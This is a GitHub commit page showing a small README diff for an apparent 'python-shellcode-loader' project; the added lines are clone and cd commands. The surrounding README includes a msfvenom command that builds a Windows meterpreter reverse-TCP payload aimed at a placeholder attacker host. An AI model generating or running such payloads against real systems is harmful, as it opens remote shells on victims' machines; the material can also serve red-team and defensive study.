Skip to content

Commit 84b104b

Browse files
authored
Update README.md
1 parent d83b772 commit 84b104b

File tree

1 file changed

+3
-0
lines changed

1 file changed

+3
-0
lines changed

README.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,10 @@
88
git clone https://github.com/HZzz2/python-shellcode-loader.git <br />cd python-shellcode-loader
99
<a name="CuRMC"></a>
1010

11+
git clone https://github.com/HZzz2/python-shellcode-loader.git
12+
cd python-shellcode-loader
1113
pip install -r .\requirements.txt
14+
1215
## 生成shellcode
1316
#生成shellcode<br />`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw`
1417
<a name="rNUTI"></a>

0 commit comments

Comments
 (0)